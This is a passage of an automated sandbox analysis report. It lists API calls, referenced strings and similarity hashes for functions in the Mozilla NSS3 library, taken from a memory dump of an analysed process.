                                                            • TlsGetValue.KERNEL32(?,?,?,6CA42E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA14F1C), ref: 6CA28EDC
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,6CA42E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA28EF1
                                                            • PR_Unlock.NSS3 ref: 6CA28F20
                                                            Similarity
                                                            • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                            • String ID:
                                                            • API String ID: 1978757487-0
                                                            • Opcode ID: c174aced25c921808efc216293fc030c05abf2d1e5eca9c0e880fc9bcf17ad49
                                                            • Instruction ID: 80425a68ceb6efed5caca9433132e75c4d58e42c87d862a9cb4af66aecbb89a9
                                                            • Opcode Fuzzy Hash: c174aced25c921808efc216293fc030c05abf2d1e5eca9c0e880fc9bcf17ad49
                                                            • Instruction Fuzzy Hash: 7421BF719097159FD700AF29C584199BBF0FF08318F09856EED988BB40D734E894CBC2
                                                            APIs
                                                              • Part of subcall function 6CA41E10: TlsGetValue.KERNEL32 ref: 6CA41E36
                                                              • Part of subcall function 6CA41E10: EnterCriticalSection.KERNEL32(?,?,?,6CA1B1EE,2404110F,?,?), ref: 6CA41E4B
                                                              • Part of subcall function 6CA41E10: PR_Unlock.NSS3 ref: 6CA41E76
                                                            • free.MOZGLUE(?,6CA2D079,00000000,00000001), ref: 6CA2CDA5
                                                            • PK11_FreeSymKey.NSS3(?,6CA2D079,00000000,00000001), ref: 6CA2CDB6
                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CA2D079,00000000,00000001), ref: 6CA2CDCF
                                                            • DeleteCriticalSection.KERNEL32(?,6CA2D079,00000000,00000001), ref: 6CA2CDE2
                                                            • free.MOZGLUE(?), ref: 6CA2CDE9
                                                            Similarity
                                                            • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                            • String ID:
                                                            • API String ID: 1720798025-0
                                                            • Opcode ID: 164c00ba5490f3fc8121950d693a594dc7ac20cd297c4f46eb8ca4ae3ae89cdd
                                                            • Instruction ID: 907c09375b7b78e7bbbe83f964dbbf0dd543d61a69f057d2dd1267cc2360ab2a
                                                            • Opcode Fuzzy Hash: 164c00ba5490f3fc8121950d693a594dc7ac20cd297c4f46eb8ca4ae3ae89cdd
                                                            • Instruction Fuzzy Hash: 9011C6B6B01125ABEB00AE65EC45E96B73DFF0425C7184131F90987E01D735E4B4CBD1
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6CA638A2), ref: 6CA63DB0
                                                            • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6CA638A2), ref: 6CA63DBF
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6CA638A2), ref: 6CA63DD9
                                                            • _wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6CA638A2), ref: 6CA63DE7
                                                            • free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6CA638A2), ref: 6CA63DF8
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
                                                            • String ID:
                                                            • API String ID: 1642359729-0
                                                            • Opcode ID: 778d4f5daf667e1a5e3da72f29ac3293fe1f4c5fb7b0a841b4095b0e51960bda
                                                            • Instruction ID: c17f5dd98bd4cf9cce9dc3640e3e155515360d375c7c82b3368fb7a069a31152
                                                            • Opcode Fuzzy Hash: 778d4f5daf667e1a5e3da72f29ac3293fe1f4c5fb7b0a841b4095b0e51960bda
                                                            • Instruction Fuzzy Hash: 780126B57061227BFB105AB65C09E3B3DADDB41AA8B180235FD28DBA80EA11DC1181F1
                                                            APIs
                                                              • Part of subcall function 6CA95B40: PR_GetIdentitiesLayer.NSS3 ref: 6CA95B56
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA92CEC
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA92D02
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA92D1F
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA92D42
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA92D5B
                                                            Similarity
                                                            • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                            • String ID:
                                                            • API String ID: 1593528140-0
                                                            • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                            • Instruction ID: 2d997773c706ac3874e9a4e6ec547c3b929af4f77db19822940ee9a139db6b9b
                                                            • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                            • Instruction Fuzzy Hash: 2701CCB1A102049BEB305E3AFD42BC777E1EF4531CF044625E45986720D732F8598793
                                                            APIs
                                                              • Part of subcall function 6CA95B40: PR_GetIdentitiesLayer.NSS3 ref: 6CA95B56
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA92D9C
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA92DB2
                                                            • PR_EnterMonitor.NSS3(?), ref: 6CA92DCF
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA92DF2
                                                            • PR_ExitMonitor.NSS3(?), ref: 6CA92E0B
                                                            Similarity
                                                            • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                            • String ID:
                                                            • API String ID: 1593528140-0
                                                            • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                            • Instruction ID: aeb6426f90f13c95590acdda4a846fda8897dea371b5faafff3a8171d5e12b9a
                                                            • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                            • Instruction Fuzzy Hash: 3501A5B1A202009BE7309E3AFD42BC7B7F5EB45318F040635E85A86B21D632E8598693
                                                            APIs
                                                            • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CB17AFE,?,?,?,?,?,?,?,?,6CB1798A), ref: 6CB1BDC3
                                                            • free.MOZGLUE(?,?,6CB17AFE,?,?,?,?,?,?,?,?,6CB1798A), ref: 6CB1BDCA
                                                            • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CB17AFE,?,?,?,?,?,?,?,?,6CB1798A), ref: 6CB1BDE9
                                                            • free.MOZGLUE(?,00000000,00000000,?,6CB17AFE,?,?,?,?,?,?,?,?,6CB1798A), ref: 6CB1BE21
                                                            • free.MOZGLUE(00000000,00000000,?,6CB17AFE,?,?,?,?,?,?,?,?,6CB1798A), ref: 6CB1BE32
                                                            Similarity
                                                            • API ID: free$CriticalDeleteDestroyMonitorSection
                                                            • String ID:
                                                            • API String ID: 3662805584-0
                                                            • Opcode ID: da5f17c94e2ccc4c7f43628f8385b681df71c25e964007c4c1ee29b300f3086a
                                                            • Instruction ID: d09da5fc4a7bc8d03864ff6c2c81c77a82f5ee0079093cb013533bd359f04d52
                                                            • Opcode Fuzzy Hash: da5f17c94e2ccc4c7f43628f8385b681df71c25e964007c4c1ee29b300f3086a
                                                            • Instruction Fuzzy Hash: 6511ECB5B052509FFF00DF6AD849B223BBEFB4A254B540069E68AC7791D7319414CF93
                                                            APIs
                                                            • PR_Free.NSS3(?), ref: 6CB17C73
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB17C83
                                                            • malloc.MOZGLUE(00000001), ref: 6CB17C8D
                                                            • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CB17C9F
                                                            • PR_GetCurrentThread.NSS3 ref: 6CB17CAD
                                                              • Part of subcall function 6CAC9BF0: TlsGetValue.KERNEL32(?,?,?,6CB10A75), ref: 6CAC9C07
                                                            Similarity
                                                            • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                            • String ID:
                                                            • API String ID: 105370314-0
                                                            • Opcode ID: be20be7889594ed387f3ab431e43f4317a5557182224d4c1ce25d6f3701f53b4
                                                            • Instruction ID: 41e64e3d2b20982e709fc70a31dd6ceea6c1398a186a679a40f3f9869d6dfd8c
                                                            • Opcode Fuzzy Hash: be20be7889594ed387f3ab431e43f4317a5557182224d4c1ce25d6f3701f53b4
                                                            • Instruction Fuzzy Hash: 16F0C2B1A142467BEB009F7ADD0998B7B58EF04269B118435E809D3F00EB30E118CAE6
                                                            APIs
                                                            • DeleteCriticalSection.KERNEL32(6CB1A6D8), ref: 6CB1AE0D
                                                            • free.MOZGLUE(?), ref: 6CB1AE14
                                                            • DeleteCriticalSection.KERNEL32(6CB1A6D8), ref: 6CB1AE36
                                                            • free.MOZGLUE(?), ref: 6CB1AE3D
                                                            • free.MOZGLUE(00000000,00000000,?,?,6CB1A6D8), ref: 6CB1AE47
                                                            Similarity
                                                            • API ID: free$CriticalDeleteSection
                                                            • String ID:
                                                            • API String ID: 682657753-0
                                                            • Opcode ID: 4494a0f70d0084ff905451e4138124cb6facdc9b9e9ae0143d77b8286d9e2e55
                                                            • Instruction ID: 437bbb72df80369591124717117b36e58046f0bbbf571c8d9f18e13eb1b93845
                                                            • Opcode Fuzzy Hash: 4494a0f70d0084ff905451e4138124cb6facdc9b9e9ae0143d77b8286d9e2e55
                                                            • Instruction Fuzzy Hash: 2FF0F67A601A05A7CA009FA8D8089177B7DFF8E774B200328F12A83940D731F015CFD6
                                                            APIs
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9A7D35
                                                            Strings
                                                            Similarity
                                                            • API ID: sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 632333372-598938438
                                                            • Opcode ID: cde655b9fa7e794248f8e48a94a0910d0e1eef14b46a758d558ca98b5e1f668a
                                                            • Instruction ID: c65f2dbc3368ad83e861e4f2b6b9975abb458a779e5bc76e666eb6b26e81ad9f
                                                            • Opcode Fuzzy Hash: cde655b9fa7e794248f8e48a94a0910d0e1eef14b46a758d558ca98b5e1f668a
                                                            • Instruction Fuzzy Hash: 88311431E0427997C710CF9DC881DBAB7F5EF84315B594596E448B7B8AD270D842C7A0
                                                            APIs
                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C996D36
                                                            Strings
                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C996D20
                                                            • %s at line %d of [%.10s], xrefs: 6C996D2F
                                                            • database corruption, xrefs: 6C996D2A
                                                            Similarity
                                                            • API ID: sqlite3_log
                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                            • API String ID: 632333372-598938438
                                                            • Opcode ID: 951f71b548ce694be74d74f5f084fdffcb7ab0a934ce79b4815a805429a8da76
                                                            • Instruction ID: 5079249b6fc9a80e7b3a4af4887a1b58e5ad2601302f4700bc1114c95692526d
                                                            • Opcode Fuzzy Hash: 951f71b548ce694be74d74f5f084fdffcb7ab0a934ce79b4815a805429a8da76
                                                            • Instruction Fuzzy Hash: 2C21F1316043059BC710CE19C841B5AB7F6AF95318F28892DD8699BFA1E771F948C7D2
                                                            APIs
                                                              • Part of subcall function 6CACCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CACCC7B), ref: 6CACCD7A
                                                              • Part of subcall function 6CACCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CACCD8E
                                                              • Part of subcall function 6CACCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CACCDA5
                                                              • Part of subcall function 6CACCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CACCDB8
                                                            • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CACCCB5
                                                            • memcpy.VCRUNTIME140(6CB614F4,6CB602AC,00000090), ref: 6CACCCD3
                                                            • memcpy.VCRUNTIME140(6CB61588,6CB602AC,00000090), ref: 6CACCD2B
                                                              • Part of subcall function 6C9E9AC0: socket.WSOCK32(?,00000017,6C9E99BE), ref: 6C9E9AE6
                                                              • Part of subcall function 6C9E9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C9E99BE), ref: 6C9E9AFC
                                                              • Part of subcall function 6C9F0590: closesocket.WSOCK32(6C9E9A8F,?,?,6C9E9A8F,00000000), ref: 6C9F0597
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                            • String ID: Ipv6_to_Ipv4 layer
                                                            • API String ID: 1231378898-412307543
                                                            • Opcode ID: 8498d9bca57b8af0bc6bf7642870b1c1192b9c8faf696023d8a3447a2b6c4b27
                                                            • Instruction ID: 97ceab1514950edd6150c8546ca31597da32adca52a67cb643ca5aa1d386f7f3
                                                            • Opcode Fuzzy Hash: 8498d9bca57b8af0bc6bf7642870b1c1192b9c8faf696023d8a3447a2b6c4b27
                                                            • Instruction Fuzzy Hash: 771181F6B082D05EDB009F5BD806776BAA8A757718F181029E41ADBFC1E771C8044BD7
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_Initialize), ref: 6CA31CD8
                                                            • PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CA31CF1
                                                              • Part of subcall function 6CB109D0: PR_Now.NSS3 ref: 6CB10A22
                                                              • Part of subcall function 6CB109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CB10A35
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CB10A66
                                                              • Part of subcall function 6CB109D0: PR_GetCurrentThread.NSS3 ref: 6CB10A70
                                                              • Part of subcall function 6CB109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CB10A9D
                                                              • Part of subcall function 6CB109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CB10AC8
                                                              • Part of subcall function 6CB109D0: PR_vsmprintf.NSS3(?,?), ref: 6CB10AE8
                                                              • Part of subcall function 6CB109D0: EnterCriticalSection.KERNEL32(?), ref: 6CB10B19
                                                              • Part of subcall function 6CB109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CB10B48
                                                              • Part of subcall function 6CB109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CB10C76
                                                              • Part of subcall function 6CB109D0: PR_LogFlush.NSS3 ref: 6CB10C7E
                                                            Strings
                                                            Similarity
                                                            • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                            • String ID: pInitArgs = 0x%p$C_Initialize
                                                            • API String ID: 1907330108-3943720641
                                                            • Opcode ID: d6488faa897c311b9ce067e8c8983285bb0bda69cb2db694bb3104eb321dc8d6
                                                            • Instruction ID: 92dd5594d650e60369a3433bec875684a289a1c8c21ecddc39d091e6896b373e
                                                            • Opcode Fuzzy Hash: d6488faa897c311b9ce067e8c8983285bb0bda69cb2db694bb3104eb321dc8d6
                                                            • Instruction Fuzzy Hash: 4D0180352011A09FEF019B6AE959B7932B9ABC23A9F085025E50DD3A91DF34D889C792
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CA71D8F
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CA71DA6
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA71E13
                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA71ED0
                                                            Similarity
                                                            • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                            • String ID:
                                                            • API String ID: 84796498-0
                                                            • Opcode ID: ddb2b777ed5aab6a1526be00bc265f2f07df360be518821090c45d49d6047b99
                                                            • Instruction ID: 02582e39c9cbc4b190c748e550c3d60300c412e0f74eb70e870658e73ccda029
                                                            • Opcode Fuzzy Hash: ddb2b777ed5aab6a1526be00bc265f2f07df360be518821090c45d49d6047b99
                                                            • Instruction Fuzzy Hash: 7D515B75A002098FDB14CF94C894BBEB7FABF45308F144129E91D9B751D731E989CBA0
                                                            APIs
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAD7E10
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAD7EA6
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAD7EB5
                                                            • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CAD7ED8
                                                            Similarity
                                                            • API ID: _byteswap_ulong
                                                            • String ID:
                                                            • API String ID: 4101233201-0
                                                            • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                            • Instruction ID: de061e85497c5bc520fdacb1951e8b0e2d05f447d20b3bca3416d6ee491c3efe
                                                            • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                            • Instruction Fuzzy Hash: 683184B1A011118FDB08CF09D89099EBBB2BF8831871B8569D8599BB15EB71EC45CBD1
                                                            APIs
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA06C8D
                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA06CA9
                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CA06CC0
                                                            • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CB28FE0), ref: 6CA06CFE
                                                            Similarity
                                                            • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                            • String ID:
                                                            • API String ID: 2370200771-0
                                                            • Opcode ID: 6150db4ae02b20706fbf35d16442c8b3ceacc3bad4fad178f6ebce28c8bda0ff
                                                            • Instruction ID: 6f542a9b984a292c9e261c8b9cb99190d6043a4e12ebd50542808b681bd4af00
                                                            • Opcode Fuzzy Hash: 6150db4ae02b20706fbf35d16442c8b3ceacc3bad4fad178f6ebce28c8bda0ff
                                                            • Instruction Fuzzy Hash: 633180B5A002169FDB04CF65D891ABFBBF5EF4528CB14442DDD05D7700EB319985CBA0
                                                            APIs
                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CA76E36
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA76E57
                                                              • Part of subcall function 6CAAC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CAAC2BF
                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CA76E7D
                                                            • PR_MillisecondsToInterval.NSS3(?), ref: 6CA76EAA
                                                            Similarity
                                                            • API ID: IntervalMilliseconds$ErrorValue
                                                            • String ID:
                                                            • API String ID: 3163584228-0
                                                            • Opcode ID: 2876adf79b6ddd0f93d774558eec6a800e48f17fdff301c78084ee19a1bf09d7
                                                            • Instruction ID: 75e8ceec07a45733001ee29af5968d9f075309903587248c7ba4b86f26375508
                                                            • Opcode Fuzzy Hash: 2876adf79b6ddd0f93d774558eec6a800e48f17fdff301c78084ee19a1bf09d7
                                                            • Instruction Fuzzy Hash: 8731C13A610612EEDB241E34DD04396B7B5BB0131AF14063CD899D6B91EB30A9D8CBB2
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CA5DDB1,?,00000000), ref: 6CA5DDF4
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CA5DDB1,?,00000000), ref: 6CA5DE0B
                                                            • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CA5DDB1,?,00000000), ref: 6CA5DE17
                                                              • Part of subcall function 6CA60BE0: malloc.MOZGLUE(6CA58D2D,?,00000000,?), ref: 6CA60BF8
                                                              • Part of subcall function 6CA60BE0: TlsGetValue.KERNEL32(6CA58D2D,?,00000000,?), ref: 6CA60C15
                                                            • PR_SetError.NSS3(FFFFE009,00000000), ref: 6CA5DE80
                                                            Similarity
                                                            • API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
                                                            • String ID:
                                                            • API String ID: 3725328900-0
                                                            • Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                            • Instruction ID: 7300c20f44699c70130f976295199e243c2281b1580e83563a0091f2d65ac252
                                                            • Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
                                                            • Instruction Fuzzy Hash: 023193B1E017429BE700CF56DA80666F7B4BFA5318B64C22ADD1987B01E771E5E4CB90
                                                            APIs
                                                            • PORT_ArenaMark_Util.NSS3(?), ref: 6CA72E08
                                                              • Part of subcall function 6CA614C0: TlsGetValue.KERNEL32 ref: 6CA614E0
                                                              • Part of subcall function 6CA614C0: EnterCriticalSection.KERNEL32 ref: 6CA614F5
                                                              • Part of subcall function 6CA614C0: PR_Unlock.NSS3 ref: 6CA6150D
                                                            • PORT_NewArena_Util.NSS3(00000400), ref: 6CA72E1C
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CA72E3B
                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA72E95
                                                              • Part of subcall function 6CA61200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA088A4,00000000,00000000), ref: 6CA61228
                                                              • Part of subcall function 6CA61200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CA61238
                                                              • Part of subcall function 6CA61200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CA088A4,00000000,00000000), ref: 6CA6124B
                                                              • Part of subcall function 6CA61200: PR_CallOnce.NSS3(6CB62AA4,6CA612D0,00000000,00000000,00000000,?,6CA088A4,00000000,00000000), ref: 6CA6125D
                                                              • Part of subcall function 6CA61200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CA6126F
                                                              • Part of subcall function 6CA61200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CA61280
                                                              • Part of subcall function 6CA61200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CA6128E
                                                              • Part of subcall function 6CA61200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CA6129A
                                                              • Part of subcall function 6CA61200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CA612A1
                                                            Similarity
                                                            • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                            • String ID:
                                                            • API String ID: 1441289343-0
                                                            • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                            • Instruction ID: e06c9b6743cd8ce67791bdd3080646e479b03465d67799be95aa172f8b780dbc
                                                            • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                            • Instruction Fuzzy Hash: 4D21F5B5D003418BE710CF159D44BAA3B747F9130CF151369DD089B742F7B1E5C882A2
                                                            APIs
                                                            • CERT_NewCertList.NSS3 ref: 6CA2ACC2
                                                              • Part of subcall function 6CA02F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CA02F0A
                                                              • Part of subcall function 6CA02F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA02F1D
                                                              • Part of subcall function 6CA02AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CA00A1B,00000000), ref: 6CA02AF0
                                                              • Part of subcall function 6CA02AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA02B11
                                                            • CERT_DestroyCertList.NSS3(00000000), ref: 6CA2AD5E
                                                              • Part of subcall function 6CA457D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CA0B41E,00000000,00000000,?,00000000,?,6CA0B41E,00000000,00000000,00000001,?), ref: 6CA457E0
                                                              • Part of subcall function 6CA457D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CA45843
                                                            • CERT_DestroyCertList.NSS3(?), ref: 6CA2AD36
                                                              • Part of subcall function 6CA02F50: CERT_DestroyCertificate.NSS3(?), ref: 6CA02F65
                                                              • Part of subcall function 6CA02F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA02F83
                                                            • free.MOZGLUE(?), ref: 6CA2AD4F
                                                            Similarity
                                                            • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                            • String ID:
                                                            • API String ID: 132756963-0
                                                            • Opcode ID: 971eb6e30f5cd2877cbdfa1d936eea9c5eee1266cc5804bed16ef1bafdee9a40
                                                            • Instruction ID: 510f43720fb72736495433947f1da424bbfbd498cc4cb9fe6485dac0d0187f66
                                                            • Opcode Fuzzy Hash: 971eb6e30f5cd2877cbdfa1d936eea9c5eee1266cc5804bed16ef1bafdee9a40
                                                            • Instruction Fuzzy Hash: 8A21C6B1D002248BEF10DF64E9055EE77B5AF05248F494168D808B7600FB35AE99CBA1
                                                            APIs
                                                            • TlsGetValue.KERNEL32 ref: 6CA53C9E
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA53CAE
                                                            • PR_Unlock.NSS3(?), ref: 6CA53CEA
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA53D02
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterErrorSectionUnlockValue
                                                            • String ID:
                                                            • API String ID: 284873373-0
                                                            • Opcode ID: 793e070fb9aa8e29b44a4d27fcba94bb543fcf86d4e5ebaed93e9d1cd61a5e60
                                                            • Instruction ID: 5f487e98c98d9ec79d8f6ca24c5d916d263df845c5d8ccda40d67d2a50182ba2
                                                            • Opcode Fuzzy Hash: 793e070fb9aa8e29b44a4d27fcba94bb543fcf86d4e5ebaed93e9d1cd61a5e60
